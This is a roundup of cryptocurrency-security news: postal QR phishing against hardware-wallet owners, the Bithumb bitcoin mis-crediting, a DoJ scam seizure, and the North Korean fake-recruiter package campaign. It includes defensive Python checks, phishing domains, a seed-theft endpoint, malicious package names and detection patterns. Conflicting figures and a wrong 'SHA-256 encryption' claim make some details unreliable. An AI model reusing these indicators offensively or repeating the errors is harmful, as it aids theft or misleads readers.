
Coinbase CEO Says Quantum Threat to Crypto Is Manageable

Coinbase Chief Executive Brian Armstrong said concerns that quantum computing could undermine blockchain security are manageable, describing the issue as one the crypto industry has time to address. 

Speaking to CNBC at the World Liberty Forum in Mar-a-Lago alongside Senator Bernie Moreno of Ohio, Armstrong responded to questions about whether advances in quantum technology could eventually break blockchain encryption.

“One thing I’ve heard is that quantum is going to break the blockchain. Is that true?” interviewer Sara Eisen asked. 

Armstrong dismissed the idea that the threat is imminent or unfixable. 

He said Coinbase has been proactive and is working closely with major blockchain networks to prepare for a shift toward post-quantum cryptography.

“We’re going to stay engaged on that, and I think it’s very solvable,” Armstrong said. 

Quantum computing has long been viewed as a theoretical risk to public-key cryptography, which underpins networks such as Bitcoin and Ethereum.

While current quantum systems are not powerful enough to crack widely used encryption methods, researchers warn that upgrading global financial systems and decentralized networks could take years, making early preparation important. 

Last month, Coinbase formed an independent quantum advisory board to guide its efforts. The group includes University of Texas professor Scott Aaronson, Stanford cryptographer Dan Boneh, Ethereum Foundation researcher Justin Drake and Coinbase Head of Cryptography Yehuda Lindell. 

The advisory board is expected to publish research evaluating quantum related risks and recommend migration strategies for blockchain systems. Industry observers say there is still time to transition to stronger cryptographic standards. 

Pranav Agarwal, independent director at Jetking Infotrain India, said the main concern for Bitcoin would be the potential breaking of private keys secured by SHA-256 encryption.

However, he noted that the timeline for building a large-scale quantum system capable of such an attack remains uncertain and that upgrading encryption is feasible.

“There is enough time” to strengthen cryptographic protections across major networks, including Bitcoin and Ethereum, Agarwal said. 

Across the broader crypto ecosystem, preparation has accelerated. The Ethereum Foundation recently elevated post-quantum security to a strategic priority.

Ethereum co-founder Vitalik Buterin has urged developers not to delay adopting quantum-resistant cryptography, arguing that networks should aim for long-term resilience rather than emergency fixes.

The Solana Foundation said in December that it had begun testing quantum-resistant digital signatures on a test network. Bitcoin developers have also advanced proposals such as BIP 360, designed to reduce exposure to quantum-related risks.

During the CNBC interview, Armstrong also addressed developments in U.S. market structure legislation. 

He defended Coinbase’s decision to oppose an earlier draft of a bill known as the CLARITY Act, citing concerns over how stablecoin rewards were treated in the proposal. Armstrong rejected claims that Coinbase blocked the legislation. 

He said the company raised issues that brought lawmakers back to the table and expressed confidence that a revised compromise could advance in the coming months, potentially reaching the President’s desk. 

He also voiced support for the Commodity Futures Trading Commission’s authority over event contracts and prediction markets, as policymakers continue to debate the regulatory framework for digital assets in the United States.

Trezor and Ledger Impersonated in Physical QR Code Phishing Scam Targeting Crypto Wallet Users

Criminals are now pushing fake crypto security warnings through paper mail, copying the real packaging and branding of hardware wallet makers such as Trezor and Ledger. The printed letters arrive at recipients' homes with no digital trail, which makes them feel more trustworthy than an email scam, and the stamp and envelope mimic official correspondence. The goal is the same as in any phishing campaign: to steal the secret backup (recovery) phrase used to restore a wallet. Physical delivery only lends an illusion of authenticity to an ordinary theft.

Posing as the companies' security teams, the letters tell recipients they must complete an urgent "Verification Step" or risk being locked out of their wallets. Once the recipient scans the QR code and opens the site, a countdown timer appears and pushes them to act immediately, walking them step by step through the process while warning that any delay will have immediate consequences. Under that pressure, and with apparent trust in the sender, following the instructions seems reasonable.

One letter purporting to come from Trezor told users that an "Authentication Check" had to be completed before February 15, 2026, or access to Trezor Suite could be interrupted. A forged Ledger notice likewise claimed a "Transaction Check" would become mandatory, with reduced functionality after October 15, 2025, unless the user acted. Both lead to fake sites designed to look nearly identical to the genuine setup portals; BleepingComputer's coverage shows the QR codes redirecting to websites that mimic the companies' real systems.

Rather than offering guidance, the fake sites display a cascade of alerts - accounts may be limited, transactions could fail, upgrades might stall without immediate action - each more urgent than the last, pulling the user deeper in. Eventually the site asks the victim to type in their 12-, 20-, or 24-word recovery phrase, claiming it is needed to confirm control of the device and switch on the protection.

Though typed in private, those words are sent straight to servers run by the criminals. Holding the recovery phrase, the attackers restore the wallet on their own device and drain it within minutes. Postal scams of this kind are far rarer than the daily flood of email phishing, but they are not new.

In the past, crooks have shipped tampered hardware wallets designed to capture recovery words at first use. This campaign shows attackers still testing physical channels, especially where earlier data leaks handed them home addresses. Both Trezor and Ledger have suffered breaches that exposed customer data, but there is no proof those events fed this particular campaign. However the attackers found their targets, one rule holds: your recovery phrase stays private, always.

Those earlier lapses never required anyone to share a key, and neither does anything today; safety lies in keeping the phrase secret. A recovery phrase is a single line of words with total power over the funds it controls: whoever learns it owns the wallet, immediately. Makers of hardware wallets never ask customers to type these words into a website or send them in a message.

No genuine provider will ask you to scan it, email it, or mail it, and any "official" request to share a recovery phrase is itself proof that the request is fraudulent. Never enter a recovery phrase anywhere except on the hardware wallet itself during setup or a genuine restore. When a letter arrives with an urgent request, skip the QR code entirely and check the vendor's official website instead. A single mistake can expose everything; trust only what you confirm yourself.

The campaign marks a shift in the threat landscape as crypto adoption grows: paper mail, not just online messages, has become a tool for stealing digital assets. Risks once confined to the spam folder now arrive in a physical envelope, exploiting the higher trust people still place in printed words.

U.S. Justice Department Seizes $61 Million in Tether Linked to ‘Pig Butchering’ Crypto Scams

The U.S. Department of Justice (DoJ) has revealed that it seized approximately $61 million in Tether connected to fraudulent cryptocurrency operations commonly referred to as “pig butchering” scams.

According to the department, investigators traced the confiscated digital assets to wallet addresses allegedly used to launder funds obtained through cryptocurrency investment fraud schemes. The stolen proceeds were reportedly siphoned from victims who were manipulated into investing in fake platforms promising lucrative returns.

"Criminal actors and professional money launderers use cyber-enabled fraud schemes to swindle their victims and conceal their ill-gotten gains," said HSI Charlotte Acting Special Agent in Charge Kyle D. Burns.

"HSI special agents work diligently to trace the illicit proceeds of crime across the globe to disrupt and dismantle the transnational criminal organizations that seek to defraud hardworking Americans."

Authorities explained that these schemes typically begin with scammers initiating contact through dating platforms or social media messaging applications. The perpetrators build trust by posing as romantic interests or financial advisors before persuading victims to invest in fabricated cryptocurrency opportunities.

Officials further noted that many of these operations are allegedly run from scam compounds based primarily in Southeast Asia. Individuals trafficked under false promises of well-paying jobs are reportedly forced to participate in the schemes. Their passports are confiscated, and they are coerced into deceiving targets online under threats of severe punishment.

Victims are directed to professional-looking but fraudulent investment websites that display falsified portfolios and exaggerated profits. These manipulated dashboards are designed to encourage larger investments. When victims attempt to withdraw their funds, they are often told to pay additional “fees,” resulting in further financial losses.

"Once the victims' money transferred to a cryptocurrency wallet under the scammers’ control, the crooks quickly routed that money through many other wallets to hide the nature, source, control, and ownership of that stolen money," the department added.

In a related statement, Tether disclosed that it has frozen roughly $4.2 billion in assets tied to unlawful activities so far. The company said that nearly $250 million of that amount has been linked to scam networks since June 2025.

The seizure marks one of the larger enforcement actions targeting cryptocurrency-enabled fraud and reflects ongoing efforts by U.S. authorities to disrupt global cybercrime syndicates exploiting digital assets.

Bithumb Error Sends 620,000 Bitcoins to Users, Triggers Regulatory Scrutiny in South Korea

A major glitch at Bithumb, South Korea's second-largest digital currency platform, caused chaos when users suddenly found themselves holding vast quantities of bitcoin because of a flawed promotion. Instead of issuing small monetary rewards, an operational error credited 620,000 bitcoin in total. Regulators quickly stepped in and opened investigations as the scale of the incident became clear. Recovery efforts are now under way for assets exceeding $40 billion, and legal pressure is mounting on the firm while authorities assess compliance failures. What began as a routine marketing effort has become one of the largest operational blunders in the history of crypto trading.

The mistake occurred on 6 February during a promotion meant to give rewards to 695 qualifying users totaling 620,000 Korean won, about $423. Instead of selecting the local currency, an employee entered bitcoin as the asset, changing the value of the reward dramatically: what should have been small bonuses became 620,000 bitcoin, worth around $42 billion at the time. Nearly half of those who qualified, 249 people, opened their reward boxes before anyone noticed and ended up with deposits exceeding the entire crypto balance held by the platform.

Bithumb said it reversed most of the incorrect deposits by adjusting its internal records. Still, regulators noted that approximately 13 billion won, about $9 million, was unaccounted for because some users moved or cashed out funds before detection. In the roughly half hour before accounts were frozen, 86 individuals allegedly sold close to 1,788 bitcoin, causing temporary price swings on the exchange's trading system.

Criticism came quickly. Lee Chan-jin, head of South Korea's Financial Supervisory Service, called the outcome "catastrophic" for those who sold the bitcoin: with prices climbing afterward, users forced to return their holdings could end up owing money. Lee said the event was not a one-off error but revealed deeper flaws in how crypto platforms manage internal ledgers and transaction safeguards.

Legal professionals disagree about possible criminal consequences for users who withdrew the accidentally deposited bitcoin. Although crypto assets were central to a 2021 South Korean high court decision, their exclusion from the definition of "property" in penal statutes muddies the path to enforcement. Rather than pursue drawn-out lawsuits, Bithumb opened private talks with around eighty individuals who converted the bitcoin into local currency, asking for repayment in won.

The Financial Supervisory Service has opened a comprehensive review, and lawmakers in Seoul will hold an urgent session on 11 February to press officials and platform leaders for answers. Bithumb has acknowledged that changes are under way, with its payout systems being rebuilt and oversight tightened, while insisting that no cyberattack occurred and no outside actors gained access.

Bithumb Mistakenly Credits Users With Billions in Bitcoin During Promotion Error

A promotional campaign at South Korean cryptocurrency exchange Bithumb turned into a large-scale operational incident after a data-entry mistake resulted in users receiving bitcoin instead of a small cash-equivalent reward.

Initial reports suggested that certain customers were meant to receive 2,000 Korean won as part of a routine promotional payout. Instead, those accounts were credited with 2,000 bitcoin each. At current market valuations, 2,000 bitcoin represents roughly $140 million per account, transforming what should have been a minor incentive into an extraordinary allocation.

Bithumb later confirmed that the scope of the error was larger than early estimates. According to the exchange, a total of 620,000 bitcoin was mistakenly credited to 695 user accounts. Based on prevailing prices at the time of the incident, that amount corresponded to approximately $43 billion in value. The exchange stated that the issue stemmed from an internal processing mistake and was not connected to external hacking activity or a breach of its security infrastructure. It emphasized that customer asset custody systems were not compromised.

The sudden appearance of large bitcoin balances had an immediate effect on trading activity within the platform. Bithumb reported that the incident contributed to a temporary decline of about 10 percent in bitcoin’s price on its exchange, as some affected users rapidly sold the credited assets. To contain further disruption, the company restricted withdrawals and suspended certain transactions linked to the impacted accounts. It stated that 99.7 percent of the mistakenly issued bitcoin has since been recovered.

The event has revived discussion around the concept often described as “paper bitcoin.” On centralized exchanges, user balances are reflected in internal ledgers rather than always corresponding to coins held in individual blockchain wallets. In practice, exchanges may not maintain a one-to-one on-chain reserve for every displayed balance at every moment. This structural model has previously drawn criticism, most notably during the collapse of Mt. Gox in 2014, which was then the largest bitcoin exchange globally. Its failure exposed major discrepancies between reported and actual holdings.

Data from blockchain analytics firm Arkham Intelligence indicates that Bithumb currently controls digital assets worth approximately $5.3 billion. That figure is substantially lower than the $43 billion temporarily reflected in the erroneous credits, underscoring that the allocation existed within internal accounting records rather than as newly transferred blockchain assets.

Observers on social media platform X questioned how such a large discrepancy could occur without automated safeguards preventing the issuance. Bithumb has faced security challenges in the past. In 2017, an employee’s device was compromised, exposing customer data later used in phishing attempts. In 2018, around $30 million in cryptocurrency was stolen in an attack attributed to the Lazarus Group, an organization widely linked to North Korea. A further breach in 2019 resulted in losses of roughly $20 million and was initially suspected to involve insider participation. In each instance, Bithumb stated that it compensated affected users for lost funds, though earlier incidents included exposure of personal information.
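The two Bithumb items above describe the same failure: a fiat reward amount entered with a bitcoin unit, credited to hundreds of accounts, for a total larger than everything the exchange held. As an added example (not Bithumb's code), the guard below shows the checks an internal-ledger credit path should apply before a batch is written: the asset must match the approved campaign, every credit and the batch total must fit the budget, and a crypto credit can never exceed the proven reserve. All campaigns, account ids and reserve figures are constructed.

```python
"""Promotion-payout issuance guard (added example; constructed data)."""
from dataclasses import dataclass
from decimal import Decimal


@dataclass(frozen=True)
class Campaign:
    name: str
    asset: str                  # the only asset this campaign may pay in
    per_recipient_cap: Decimal  # hard ceiling per account
    total_budget: Decimal       # hard ceiling for the whole batch


@dataclass(frozen=True)
class Credit:
    account_id: str
    asset: str
    amount: Decimal


def build_batch(accounts: list[str], asset: str, amount) -> list[Credit]:
    """One credit per account; `asset` is whatever the operator selected."""
    return [Credit(a, asset, Decimal(str(amount))) for a in accounts]


def validate_batch(campaign: Campaign, credits: list[Credit],
                   reserves: dict[str, Decimal]) -> tuple[bool, str]:
    """Return (approved, reason). Fails closed: one bad row rejects the batch.

    `reserves` maps asset -> amount the exchange actually holds on-chain
    (constructed here; a real system reads custody / proof-of-reserve data).
    Fiat assets are absent from `reserves` and are bounded by the budget only.
    """
    total = Decimal(0)
    for c in credits:
        if c.asset != campaign.asset:
            # The exact failure mode in the articles: a KRW amount, a BTC unit.
            return False, (f"{c.account_id}: asset {c.asset} is not approved "
                           f"for campaign {campaign.name} ({campaign.asset})")
        if c.amount <= 0:
            return False, f"{c.account_id}: non-positive amount {c.amount}"
        if c.amount > campaign.per_recipient_cap:
            return False, (f"{c.account_id}: {c.amount} exceeds per-recipient "
                           f"cap {campaign.per_recipient_cap}")
        total += c.amount
    if total > campaign.total_budget:
        return False, f"batch total {total} exceeds budget {campaign.total_budget}"
    if campaign.asset in reserves and total > reserves[campaign.asset]:
        # Never let the internal ledger promise coins the exchange does not hold.
        return False, (f"batch total {total} {campaign.asset} exceeds reserve "
                       f"{reserves[campaign.asset]}")
    return True, f"approved {total} {campaign.asset} across {len(credits)} accounts"


# Constructed scenario data (695 accounts, as in the articles).
EVENT_PROMO = Campaign("event-reward", "KRW", Decimal("10000"), Decimal("5000000"))
# Deliberately loose limits, to show the reserve check as the last line of defence.
LOOSE_BTC_PROMO = Campaign("btc-giveaway", "BTC", Decimal("2000"), Decimal("2000000"))
RESERVES = {"BTC": Decimal("20000")}          # constructed on-chain holdings
ACCOUNTS = [f"acct-{i:03d}" for i in range(695)]

if __name__ == "__main__":
    print(validate_batch(EVENT_PROMO, build_batch(ACCOUNTS, "KRW", 2000), RESERVES))
    print(validate_batch(EVENT_PROMO, build_batch(ACCOUNTS, "BTC", 2000), RESERVES))
    print(validate_batch(LOOSE_BTC_PROMO, build_batch(ACCOUNTS, "BTC", 2000), RESERVES))
```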

Beyond cybersecurity events, the exchange has also been subject to regulatory scrutiny, including investigations related to alleged fraud, embezzlement, and promotional practices. Reports indicate it was again raided this week over concerns involving misleading advertising.

Bithumb maintains that no customer ultimately suffered a net financial loss from the recent error, though the price movement raised concerns about potential liquidations for leveraged traders. A comparable situation occurred at decentralized exchange Paradex, which reversed trades following a pricing malfunction.

The incident unfolds amid broader market strain, with digital asset prices well below their October peaks and political debate intensifying around cryptocurrency-linked business interests connected to U.S. public figures. Recent disclosures from the U.S. Department of Justice concerning Jeffrey Epstein's early involvement in cryptocurrency ventures have further fueled online speculation and conspiracy narratives across social platforms.

Cryptocurrency Market Slump Deepens Amid Global Tech Selloff and Risk-Off Sentiment

The crypto market is falling as turmoil spreads beyond tech stocks worldwide. As investors pull back sharply, digital currencies are taking a hit alongside the firms that hold Bitcoin on their balance sheets, and worry is growing over how deeply losses might spread through finance and tech alike.

Bitcoin has dropped sharply, pushing prices toward their weakest level since early 2023. Down nearly 12 percent yesterday alone, it now trades near $60,000, according to CoinMarketCap. It had recently hovered near $72,000, and four months ago it stood at about $126,000; today less than half of that remains.

The plunge highlights how deeply the current retreat is cutting. Ongoing sell-offs, paired with steady outflows from spot Bitcoin ETFs, are weighing heavily on price direction. Every upward move in Bitcoin has stalled around $60,000, a pattern that, according to Pi42 co-founder and chief executive Avinash Shekhar, has shaped a guarded mindset among investors: each time gains slip away, faith in a short-term rebound weakens, and with swings growing sharper, traders hesitate.

Even after the steep drop, Bitcoin showed signs of stabilizing around $65,000 by Friday morning in Indian trading. Still, the overall market value fell almost 9 per cent to about $1.3 trillion. Trading volume jumped more than 90 per cent, with approximately $143 billion in Bitcoin changing hands in a single day. Roughly half of all crypto investors kept leaning toward the major coins under pressure, with Bitcoin holding nearly 58 per cent of the market. Stability returned slowly while trading intensity stayed high, and despite stronger signals elsewhere, wider economic pressures continue to cloud sentiment.

According to Giottus chief executive Vikram Subburaj, conditions reflect a typical pullback: liquidity is shrinking, buyers are hesitating and global concerns linger unresolved. Shrinking exchange-traded fund inflows and strained on-chain metrics have together dampened appetite for crypto, deepening the decline over recent weeks. It is the toughest stretch for digital currencies since last October, just before Donald Trump secured the presidency after sending pro-crypto signals throughout his campaign.

Bitcoin is not alone: Ethereum, BNB, Solana, XRP, Dogecoin, Cardano and Bitcoin Cash all slid 9 to 13 percent in tandem, pointing to a sector-wide pullback rather than an isolated dip, and confidence now appears fragile across major assets. Crypto's overall market value now sits near $2.22 trillion, a loss of more than $2 trillion from the October 2025 high of about $4.39 trillion, with nearly half of that value vanishing within only four weeks. Rather than stabilizing, investor mood has soured as metals such as gold and silver, normally seen as safe havens, have swung alongside slumping stock markets.

Appetite for risk-heavy assets has cooled noticeably. Amid weaker US job figures and rising worries over heavy AI spending, the cryptocurrency space stays under pressure, says Akshat Siddhant of Mudrex, and with global markets cautious the downward trend holds for now. Even so, patient Bitcoin holders may find pockets of value worth watching: short-term volatility lingers, but the broader downturn is not seen as a barrier to strategic entry points, and following such dips carefully may matter more than reacting quickly.

Fraudsters Use Postal Mail to Target Crypto Hardware Wallet Owners

Cybercriminals are using traditional mail services to target cryptocurrency users who own hardware wallets manufactured by Trezor and Ledger. The attackers are distributing printed letters that falsely present themselves as official security notifications and attempt to trick recipients into revealing their wallet recovery phrases.

The letters instruct users to complete a compulsory “Authentication Check” or “Transaction Check,” claiming this step will soon become mandatory. Recipients are warned that failure to comply before stated deadlines could result in disrupted wallet functionality. One Trezor-themed letter sets February 15, 2026 as the cutoff date, while a Ledger-branded version references October 15, 2025.

The correspondence appears professionally formatted and claims to originate from internal security or compliance departments. In a case shared publicly by cybersecurity researcher Dmitry Smilyanets, a Trezor-related letter stated that authentication would soon be enforced across devices and urged users to scan a QR code to prevent interruption of Trezor Suite access. The letter further asserted that even if users had already enabled authentication on their device, they must repeat the process to ensure full activation and synchronization of the feature.

The QR codes direct recipients to fraudulent domains including trezor.authentication-check[.]io and ledger.setuptransactioncheck[.]com. At the time of reporting, the Ledger-linked domain was inactive, while the Trezor-related site remained accessible but displayed a phishing warning from Cloudflare.

The Trezor-themed phishing page states that users must complete authentication by February 15, 2026 unless they purchased specific models, including Trezor Safe 7, Safe 5, Safe 3, or Safe 1, after November 30, 2025, in which case the feature is allegedly preconfigured. After selecting “Get Started,” users are warned that ignoring the process could lead to blocked access, transaction signing errors, and complications with future updates.

Those who continue are prompted to enter their wallet recovery phrase. The form accepts 12-, 20-, or 24-word phrases and claims the information is necessary to confirm device ownership. Technical analysis shows that submitted phrases are transmitted through a backend endpoint located at /black/api/send.php on the phishing domain.

With access to the recovery phrase, attackers can restore the wallet on another device and transfer funds.

The method used to identify recipients remains unclear. However, both manufacturers have experienced past data breaches that exposed customer contact information, potentially increasing targeting risks.

Although email-based crypto phishing is common, physical mail scams remain relatively uncommon. In 2021, attackers mailed tampered Ledger devices designed to capture recovery phrases during setup. A similar postal campaign targeting Ledger users was reported again in April.

A recovery phrase, also called a seed phrase, represents the private cryptographic key controlling a cryptocurrency wallet. Anyone who obtains it gains complete control over the associated funds.

Legitimate hardware wallet providers do not request recovery phrases through mail, QR codes, websites, or email. The phrase should only be entered directly on the hardware device during a genuine restoration process.
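One check the two postal-phishing items above suggest, as an added example (not code from the articles, Trezor or Ledger): before trusting a QR code or printed URL, resolve it to its registrable domain and ask whether the brand name is merely decorating a domain the vendor does not own, which is exactly how the two domains quoted above are built. The official-domain table and the public-suffix shortlist are assumptions for illustration; defanged `[.]` notation is accepted so indicators can be pasted as published.

```python
"""Brand-lookalike check for domains found in phishing letters (added example)."""
from urllib.parse import urlsplit

# Official registrable domains of the vendors (assumption for this example;
# verify against each vendor's own published domain list).
OFFICIAL_DOMAINS = {
    "trezor": {"trezor.io"},
    "ledger": {"ledger.com"},
}

# Minimal table of multi-label public suffixes so that "host.co.uk" resolves
# correctly; a production tool would load the full Public Suffix List.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "co.kr"}


def refang(text: str) -> str:
    """Turn defanged 'trezor[.]io' / 'hxxps://' back into a parseable form."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def host_of(url_or_host: str) -> str:
    """Extract the lower-cased hostname from a URL or bare host string."""
    s = refang(url_or_host.strip()).lower()
    if "://" not in s:
        s = "//" + s                      # make urlsplit treat it as a netloc
    return (urlsplit(s).hostname or "").rstrip(".")


def registrable_domain(host: str) -> str:
    """eTLD+1: the part of the name a registrant actually controls."""
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify(url_or_host: str) -> dict:
    """Return host, registrable domain, brands mentioned and a verdict."""
    host = host_of(url_or_host)
    reg = registrable_domain(host)
    mentioned = [b for b in OFFICIAL_DOMAINS if b in host]
    if any(reg in OFFICIAL_DOMAINS[b] for b in mentioned):
        verdict = "official"
    elif mentioned:
        # Brand present only as a subdomain label or inside a label of a
        # registrable domain the vendor does not own: classic lookalike.
        verdict = "brand-lookalike"
    else:
        verdict = "unrelated"
    return {"host": host, "registrable": reg, "brands": mentioned, "verdict": verdict}


if __name__ == "__main__":
    # The two domains quoted in the article, as printed (defanged).
    for sample in ("trezor.authentication-check[.]io", "ledger.setuptransactioncheck[.]com",
                   "https://suite.trezor.io/"):
        print(classify(sample))
```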

Fraudulent Recruiters Target Developers with Malicious Coding Tests

Software developers who are accustomed to receiving unsolicited messages offering lucrative remote jobs may find the initial approach routine: a brief introduction, a well-written job description and an invitation to complete a small technical exercise. Behind recent waves of such outreach, however, lies a sophisticated operation.

Researchers have identified a new version of the long-running fake recruiter campaign linked to North Korean threat actors. It now targets JavaScript and Python developers with cryptocurrency-themed assignments.

Active since at least May 2025, the campaign has a deliberately modular design that lets its operators rapidly rebuild and redeploy infrastructure when parts of it are exposed or dismantled. Several malicious packages were quietly published to the npm and PyPI ecosystems that developers use in their routine work.

Once executed in a developer's environment, the packages act as downloaders that quietly retrieve a remote access trojan. Researchers have compiled 192 packages associated with the campaign, which they have named Graphalgo, confirming the threat's scale and persistence.

The operation is more than opportunistic phishing: it is a carefully orchestrated social engineering campaign embedded in what looks like a legitimate hiring process.

The operators impersonate recruiters from established technology companies, initiating contact through professional networking platforms and email with job descriptions, technical prerequisites and compensation details in line with the market. By cultivating trust over several exchanges, they mimic the cadence and tone of genuine recruitment cycles without resorting to urgency or alarm.

Once legitimacy is established, they send a coding assessment, typically a compressed archive, presented as a standard measure of the candidate's ability to solve problems or build blockchain-related applications.

The files contain embedded malware designed to execute as soon as the developer reviews or runs the project locally. Because the attack rides on routine practices such as cloning a repository, installing dependencies and running test scripts, it bypasses the suspicion that an unsolicited attachment would normally trigger.

According to researchers, the strategy shows a deep understanding of developer behavior, technical interview conventions and the implicit trust that structured hiring processes confer. In several observed cases, running the malicious project components gave the attackers unauthorized system access, resulting in credential harvesting and lateral movement and potentially exposing proprietary source code and corporate infrastructure.

The campaign's success rests not on exploiting software vulnerabilities but on manipulating professional norms, turning recruitment itself into a delivery channel for compromise. ReversingLabs researchers found that the infrastructure supporting the campaign is built to mirror legitimate activity in the blockchain and crypto-trading industries.

Threat actors set up fictitious companies, post detailed job listings on professional and social platforms such as LinkedIn, Facebook and Reddit, and ask candidates to complete technical assignments as part of the simulated interview process. The tasks resemble routine coding evaluations: candidates clone a repository, run the project locally, fix minor bugs and submit improvements.

The real objective, however, is not the solution submitted but the act of running the project. Doing so installs a malicious dependency sourced from a trusted ecosystem such as npm or PyPI, so the payload arrives indirectly through dependency resolution.

As the researchers point out, assembling such a repository is straightforward: a legitimate open-source template is modified to reference a compromised or weaponized package, after which the project still looks technically sound and professionally structured. In one example, a previously benign package called "bigmathutils", which had accumulated approximately 10,000 downloads, gained malicious functionality in version 1.1.0.

The package was deprecated and removed soon afterwards, a maneuver likely intended to limit forensic visibility. The broader campaign was later dubbed Graphalgo for its frequent use of packages containing the term "graph" that imitate well-established libraries such as graphlib.

Since December 2025, researchers have observed a shift toward package names containing the word "big", although the recruitment infrastructure associated with that phase has not been comprehensively identified. To lend structural legitimacy to their operations, the actors use GitHub Organizations, and the visible project files in the GitHub repositories contain no overtly malicious code.

Instead, compromise occurs when external dependencies are resolved - Graphalgo packages retrieved from npm or PyPI - which separates the malicious logic from the repository and makes detection harder. Developers who run the projects as instructed inadvertently install a remote access trojan on their systems. Analysis of the malware shows it can enumerate processes, execute arbitrary commands via command-and-control channels, exfiltrate data and deliver secondary payloads.
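As an added example (not ReversingLabs' tooling or anything from the campaign), the audit below is what a developer or security team can run over a received coding test's manifests before typing `npm install` or `pip install -r requirements.txt`: it lists every third-party package that would be resolved and flags lookalikes of well-known libraries, the "graph"/"big" naming patterns the article reports, and anything not on a team allowlist. The allowlist, the known-library set and both sample manifests are constructed; only the name "bigmathutils" and its version 1.1.0 come from the article, and "graphlib-utils" and "grpahlib" are made-up names.

```python
"""Pre-install dependency audit for an unsolicited coding-test project (added example)."""
import json
import re

# Well-known libraries that lookalikes imitate (extend for your stack).
KNOWN_LIBRARIES = {"graphlib", "lodash", "express", "requests", "numpy", "web3"}
# Packages the team has already vetted (assumption: maintained by the org).
APPROVED = {"express", "lodash", "requests", "numpy", "graphlib"}
# Substrings the article reports the campaign favoured in package names.
CAMPAIGN_PATTERNS = ("graph", "big")


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; fine for short package names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def npm_dependencies(package_json: str) -> dict[str, str]:
    """All declared npm dependencies (prod, dev, optional) -> version spec."""
    data = json.loads(package_json)
    deps: dict[str, str] = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(data.get(section, {}))
    return deps


def pip_dependencies(requirements_txt: str) -> dict[str, str]:
    """Package -> version spec from a requirements file; options and comments skipped."""
    deps: dict[str, str] = {}
    for raw in requirements_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue                       # -r other.txt, --index-url, ...
        m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(.*)$", line)
        if m:
            deps[m.group(1).lower()] = m.group(2).strip() or "*"
    return deps


def audit(deps: dict[str, str]) -> list[tuple[str, str]]:
    """Return (package, reason) for every dependency that needs a human look."""
    findings = []
    for name in sorted(deps):
        base = name.split("/")[-1]         # drop an npm scope such as @org/
        if base in APPROVED:
            continue
        reasons = []
        for lib in sorted(KNOWN_LIBRARIES):
            # Near-duplicate spelling, or a well-known name used as a prefix.
            if base != lib and (edit_distance(base, lib) <= 2 or base.startswith(lib)):
                reasons.append(f"lookalike of {lib}")
                break
        if any(p in base for p in CAMPAIGN_PATTERNS):
            reasons.append("matches campaign naming pattern")
        if not reasons:
            reasons.append("not on approved list")
        findings.append((name, "; ".join(reasons)))
    return findings


# Constructed sample manifests, as they might arrive inside a "coding test" archive.
SAMPLE_PACKAGE_JSON = """{
  "name": "trading-bot-assessment",
  "dependencies": {"express": "^4.18.2", "graphlib-utils": "1.1.0", "web3": "^4.0.0"},
  "devDependencies": {"bigmathutils": "1.1.0"}
}"""

SAMPLE_REQUIREMENTS = """# constructed requirements file
requests==2.31.0
grpahlib            # constructed typo of graphlib
-r extra.txt
"""

if __name__ == "__main__":
    for pkg, why in audit(npm_dependencies(SAMPLE_PACKAGE_JSON)):
        print(f"npm  {pkg}: {why}")
    for pkg, why in audit(pip_dependencies(SAMPLE_REQUIREMENTS)):
        print(f"pypi {pkg}: {why}")
```

Anything flagged is a reason to read the package's published source (not just the repository) or to run the project only in a disposable, network-restricted environment.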

A financial motive centered on cryptocurrency theft is also evident from the fact that the RAT checks for the MetaMask browser extension. According to researchers, multiple developers were compromised before the activity was discovered, demonstrating how effective it is to embed malicious logic in the trusted mechanics of a software development workflow.

A technical examination of the later infection stages shows that the intermediate payloads serve mainly as downloaders, retrieving the final remote access trojan from the attacker's infrastructure. Once deployed, the RAT communicates periodically with its command-and-control server, polling it for tasking and executing the operator's instructions. 

Its feature set is consistent with mature post-exploitation tooling: file upload and download, process enumeration, and execution of arbitrary system commands. Communications with the C2 endpoint are token-protected, requiring a valid server-issued token when registering an agent or issuing a command. 

This additional authentication layer is believed to restrict unsolicited interaction with the infrastructure, and it reflects operational discipline previously observed in North Korean state-backed campaigns. The MetaMask check, in particular, aligns with the financial motivations historically linked to Pyongyang-aligned groups. 

As part of their investigation, researchers identified three functionally equivalent variants of the final payload implemented in different languages. JavaScript and Python versions were distributed through malicious packages hosted on npm and PyPI, while a third variant, written in Visual Basic Script, was found independently. 

The VBS sample (SHA1 dbb4031e9bb8f8821a5758a6c308932b88599f18), first noted in early February 2026, communicates with the same C2 infrastructure associated with the earlier "graph"-named packages. This suggests that a parallel, or as yet unidentified, recruitment frontend is part of the broader operation. North Korean activity in public open-source ecosystems has been documented in a number of earlier cases. 

In 2023, ReversingLabs detected a malicious PyPI campaign, later dubbed VMConnect and attributed to the Lazarus Group, that impersonated legitimate packages. The weaponized packages were linked to convincing GitHub repositories that reinforced trust before malware was delivered from attacker infrastructure.

A year later, researchers observed the VMConnect tradecraft continuing, this time incorporating fabricated coding assessments tied to fraudulent job interviews. In some instances the actors assumed the identity of Capital One, demonstrating their willingness to appropriate established corporate identities to legitimize outreach. Other security firms have confirmed the pattern in their own reporting. 

In 2023, Phylum reported npm malware campaigns that used token-based mechanisms and paired packages to avoid detection, while Unit 42 documented the methods North Korean state-sponsored actors used to distribute multi-stage malware through developer ecosystems. Disclosures from Veracode and Socket during 2024 and 2025 identified further npm packages attributed to Lazarus-related activity, including second-stage payloads that erased forensic evidence once the package executed.

In the present campaign, attribution rests on a convergence of technical and operational indicators rather than a single artifact. The tradecraft observed, using fake interviews to gain access, cryptocurrency-themed lures, multistage payload chains layered with obfuscation, and deliberately staggered releases of benign and malicious package versions, matches previously documented Lazarus methods. 

